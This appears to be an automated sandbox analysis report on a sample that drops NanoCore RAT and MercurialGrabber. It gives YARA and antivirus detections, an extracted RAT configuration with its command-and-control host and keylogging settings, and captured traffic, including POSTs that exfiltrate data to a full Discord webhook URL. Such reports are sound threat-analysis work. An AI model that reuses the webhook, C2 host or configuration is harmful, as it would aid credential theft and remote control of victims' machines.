Source: nano.exe, 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nano.exe, 00000002.00000002.552500603.00000000032A1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.552500603.00000000032A1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nano.exe, 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: 4Y85lSOUJ0.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe.2.dr	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe.0.dr	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\nano.exe	Code function: 2_2_054D29FA bind,		2_2_054D29FA
Source: C:\ProgramData\nano.exe	Code function: 2_2_054D29D7 bind,		2_2_054D29D7

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
162.159.137.232	discord.com	United States	13335	CLOUDFLARENETUS	true
23.128.64.141	ip4.seeip.org	United States	19969	JOESDATACENTERUS	false

Contacted Domains

Name	IP	Active
discord.com	162.159.137.232	true
ip-api.com	208.95.112.1	true
ip4.seeip.org	23.128.64.141	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
https://ip4.seeip.org/	false	URL Reputation: safe	unknown
http://ip-api.com//json/84.17.52.18	false		high
https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp	Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "e5633be0-23ed-438f-a28c-ab363fff", "Group": "Lol ve Valo", "Domain1": "alpay.germanywestcentral.cloudapp.azure.com", "Domain2": "", "Port": 6000, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 4985, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "fcff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "alpay.germanywestcentral.cloudapp.azure.com"}
Source: 5.2.output.exe.300000.0.unpack	Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7"}

Multi AV Scanner detection for submitted file

Source: 4Y85lSOUJ0.exe	Virustotal: Detection: 73%			Perma Link
Source: 4Y85lSOUJ0.exe	ReversingLabs: Detection: 82%

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Antivirus / Scanner detection for submitted sample

Source: 4Y85lSOUJ0.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\ProgramData\output.exe	Avira: detection malicious, Label: HEUR/AGEN.1137455
Source: C:\ProgramData\nano.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Metadefender: Detection: 85%	Perma Link
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 96%
Source: C:\ProgramData\nano.exe	Metadefender: Detection: 85%	Perma Link
Source: C:\ProgramData\nano.exe	ReversingLabs: Detection: 96%
Source: C:\ProgramData\output.exe	Metadefender: Detection: 51%	Perma Link
Source: C:\ProgramData\output.exe	ReversingLabs: Detection: 85%

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

Machine Learning detection for sample

Source: 4Y85lSOUJ0.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\output.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\nano.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.nano.exe.5c40000.7.unpack	Avira: Label: TR/NanoCore.fadte
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.nano.exe.a80000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Uses 32bit PE files

Source: 4Y85lSOUJ0.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49748 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49750 version: TLS 1.0

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 4Y85lSOUJ0.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: indows\mscorlib.pdbpdblib.pdb source: nano.exe, 00000002.00000002.552327927.0000000002DF5000.00000004.00000040.sdmp

Networking:

May check the online IP address of the machine

Source: C:\ProgramData\output.exe

DNS query: name: ip-api.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: alpay.germanywestcentral.cloudapp.azure.com
Source: Malware configuration extractor	URLs: https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET //json/84.17.52.18 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49748 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49750 version: TLS 1.0

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: multipart/form-data; boundary=----------3cde43b36e5043cd8b731216050e2461User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0Host: discord.comContent-Length: 662Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: multipart/form-data; boundary=----------69ea6f20e22e45fdbf9ff26e6e4a8634User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0Host: discord.comContent-Length: 106574Expect: 100-continue

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: output.exe, 00000005.00000002.303632459.000000001B473000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.
Source: output.exe, 00000005.00000002.303632459.000000001B473000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: http://discord.com
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: http://ip-api.com//json/
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com//json/84.17.52.18
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.comx
Source: output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp	String found in binary or memory: http://ip4.seeip.org
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/923954670580420641/931537240771944498/passwords.txt
